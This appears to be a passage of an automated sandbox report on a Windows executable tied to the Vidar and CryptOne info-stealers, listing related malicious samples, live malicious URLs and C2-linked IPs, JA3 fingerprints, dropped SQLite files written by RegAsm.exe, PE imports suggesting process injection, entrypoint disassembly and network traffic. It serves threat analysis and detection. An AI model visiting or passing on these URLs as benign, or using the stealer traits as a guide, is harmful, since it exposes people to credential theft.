	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Details of your DHLaccount.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
AKAMAI-ASUS	https://steam.poweredcommunityart.com/artwork/?id=8513444218	Get hash	malicious	Unknown	Browse	2.16.202.113
	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	23.199.218.33
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29
	SecuriteInfo.com.Win32.Malware-gen.24694.6353.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29
	https://moovez-my.sharepoint.com/:b:/g/personal/simon_moovez_ca/Edv73DeH8wxAlyY5r6ObSWMBK8UknZLnAtmHvI33rMNtkQ?e=cmwzxT&sdata=REl4bkJnVEZ4NlN4cFNza0l4NE05V2JFSDR0bk5xY3YvLzF0SGxncGtEbz0=&xsdata=MDV8MDJ8c3RlcGhhbmllQGZsb29yc2NhcGVzLm5ldHw1MTRlNWE4ZWFhNGY0N2Q2ODAwNjA4ZGM3NWQ0Y2VkMnxlNDEzMDg5Yjg1ZWI0ODYyYWZiZGRmODkyMzdmZTQzMHwwfDB8NjM4NTE0ODA0NDk2NDYzOTE1fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXw0MDAwMHx8fA==	Get hash	malicious	Unknown	Browse	104.102.58.241
HETZNER-ASDE	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse	116.202.5.235
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse	116.202.5.235
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	116.202.5.235
	file.exe	Get hash	malicious	Vidar	Browse	116.202.5.235
	IMG-WAA546342024-05-16 45452355353525245 1.17.29 PMTonoplast.vbs	Get hash	malicious	GuLoader, Remcos	Browse	144.76.117.26
	http://adlvanced-ip-scanner.com	Get hash	malicious	Unknown	Browse	188.40.30.100
	file.exe	Get hash	malicious	Vidar	Browse	116.202.5.235
	4QEEBmS814.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	49.13.229.86
	nPLN.exe	Get hash	malicious	FormBook	Browse	178.63.50.103
	https://globalwebagency.netlify.app/	Get hash	malicious	Unknown	Browse	195.201.57.90

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	66AF3M5zgO.exe	Get hash	malicious	Vidar	Browse	104.102.42.29 149.154.167.99
	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29 149.154.167.99
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29 149.154.167.99
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse	104.102.42.29 149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	104.102.42.29 149.154.167.99
	IMG-WAA546342024-05-16 45452355353525245 1.17.29 PMTonoplast.vbs	Get hash	malicious	GuLoader, Remcos	Browse	104.102.42.29 149.154.167.99
	DETRANmediaintgeneral.com.Lnk.lnk	Get hash	malicious	Unknown	Browse	104.102.42.29 149.154.167.99
	301O379.Lnk.lnk	Get hash	malicious	Unknown	Browse	104.102.42.29 149.154.167.99
	Forandringsstnings.vbs	Get hash	malicious	GuLoader, Remcos	Browse	104.102.42.29 149.154.167.99
	file.exe	Get hash	malicious	Unknown	Browse	104.102.42.29 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll	66AF3M5zgO.exe	Get hash	malicious	Vidar	Browse
	qbs5CBr95m.exe	Get hash	malicious	CryptOne, Vidar	Browse
	Xy52lgBlGY.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win32.Malware-gen.24694.6353.exe	Get hash	malicious	CryptOne, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe	Get hash	malicious	CryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse

Created / dropped Files

C:\ProgramData\KJDGIJECFIEB\DHCFID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJDGIJECFIEB\EBAEBF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJDGIJECFIEB\FHJEGI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJDGIJECFIEB\GCGHJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJDGIJECFIEB\HDBGDH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	modified
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJDGIJECFIEB\KFBAEC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJDGIJECFIEB\KJDGIJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34714
Entropy (8bit):	5.386623198503238
Encrypted:	false
SSDEEP:	768:Ddpqm+0Ih3YAA9CWGA0fcDAZPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ2T:Dd8m+0Ih3YAA9CWGA0FZPzzgiJmDzJtM
MD5:	1EF9C3C348E57460F3B94FC645431042
SHA1:	D91B82D9167E99DDB141F71EB8EB6EF609860D0C
SHA-256:	5F76FC8FE5351E2BF0C07C3A09D0B83F82F0B7F953537E4AB0EC025BB79798D3
SHA-512:	639CC2EF6CD5B8ED8EC35D4D40EE361AEABC4D8E09F09D6F175DA5DC6AD257221C298871248228734AFF064F9CF5E3F7E2064B6813D36A65FDCC91980242D7B5
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: 76561199686524322</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href="https:/

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 66AF3M5zgO.exe, Detection: malicious, Browse Filename: qbs5CBr95m.exe, Detection: malicious, Browse Filename: Xy52lgBlGY.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.24694.6353.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.557280266846168
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	372'736 bytes
MD5:	7e74918f0790056546b862fa3e114c2a
SHA1:	0042d5e84604f4e144ea0795db36839c50d8ed1f
SHA256:	fed19121e9d547d9762e7aa6dd53e0756c414bd0a0650e38d6b0c01b000ad2fc
SHA512:	684cfcf2f81398156460d8bb956897b6f0b4e1e230c187028c488d782305ec978eee657d3f536c7f8c431ada37f77f6398b03abe339af9ddae1dd66a5e9d2550
SSDEEP:	6144:SjyaaHbrb0YCCx3TkA1tiyGZnoi78XUeaiRkm09DLnWyYtR8/8yDe9a6n:eyaa7L1tiF2U6aas9votR8/BEFn
TLSH:	2684D051B1C0C071E56325364AF0DBB15E3EF9704FA15ECF67A40BBE4F30691DA21AAA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........r...............a.......a..k....a.......................a......................2.......2.......Rich....................PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40527b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66490AA4 [Sat May 18 20:08:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	65f8d3b7633d5a017c9f24a26c67363d

Entrypoint Preview

Instruction
call 00007F6260DFF85Eh
jmp 00007F6260DFEF29h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F6260DFEE15h
jmp 00007F6260DFF092h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045A540h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045A540h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045A540h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26b6c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5d000	0x1a54	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x250e8	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x25028	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1e000	0x164	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1bb3f	0x1bc00	896aa19da20dfcddfae4daf6f2295875	False	0.5772628096846847	data	6.600341435678309	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.bsS	0x1d000	0xa84	0xc00	3a54c614cecfd0e64b884f3c41c32ad4	False	0.5911458333333334	data	5.946566168578569	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1e000	0x9390	0x9400	05f792426862b0e0eea2c0e5e390047d	False	0.39263091216216217	data	4.707613266129105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x28000	0x3437c	0x33400	c91ec62c4af8d334d85a9e884d07d303	False	0.9840844131097561	data	7.984093459079469	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5d000	0x1a54	0x1c00	988e3cd821783dfbb1c13de905f594d2	False	0.7306082589285714	data	6.373828393083266	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

ADVAPI32.dll

CryptDecrypt

KERNEL32.dll

WaitForSingleObject, CreateRemoteThread, VirtualAlloc, FreeConsole, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EncodePointer, DecodePointer, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 19, 2024 09:08:56.125937939 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:56.126024008 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:56.126138926 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:56.133630037 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:56.133694887 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:56.851352930 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:56.851444960 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:56.899281025 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:56.899349928 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:56.900289059 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:56.900363922 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:56.904191971 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:56.948194027 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.502080917 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.502147913 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.502187967 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.502226114 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.502253056 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.502271891 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.502312899 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.502396107 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.608273983 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.608345985 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.608419895 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.608459949 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.608494043 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.608516932 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.615500927 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.615602016 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.615669012 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.615717888 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.615736961 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.615792036 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.615892887 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.615945101 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.655944109 CEST	49742	443	192.168.2.4	104.102.42.29
May 19, 2024 09:08:57.656008959 CEST	443	49742	104.102.42.29	192.168.2.4
May 19, 2024 09:08:57.727955103 CEST	49743	443	192.168.2.4	149.154.167.99
May 19, 2024 09:08:57.727981091 CEST	443	49743	149.154.167.99	192.168.2.4
May 19, 2024 09:08:57.728126049 CEST	49743	443	192.168.2.4	149.154.167.99
May 19, 2024 09:08:57.730151892 CEST	49743	443	192.168.2.4	149.154.167.99
May 19, 2024 09:08:57.730170965 CEST	443	49743	149.154.167.99	192.168.2.4
May 19, 2024 09:08:58.466494083 CEST	443	49743	149.154.167.99	192.168.2.4
May 19, 2024 09:08:58.466582060 CEST	49743	443	192.168.2.4	149.154.167.99
May 19, 2024 09:08:58.498569965 CEST	49743	443	192.168.2.4	149.154.167.99
May 19, 2024 09:08:58.498588085 CEST	443	49743	149.154.167.99	192.168.2.4
May 19, 2024 09:08:58.499627113 CEST	443	49743	149.154.167.99	192.168.2.4
May 19, 2024 09:08:58.499799013 CEST	49743	443	192.168.2.4	149.154.167.99
May 19, 2024 09:08:58.519278049 CEST	49743	443	192.168.2.4	149.154.167.99
May 19, 2024 09:08:58.564121962 CEST	443	49743	149.154.167.99	192.168.2.4
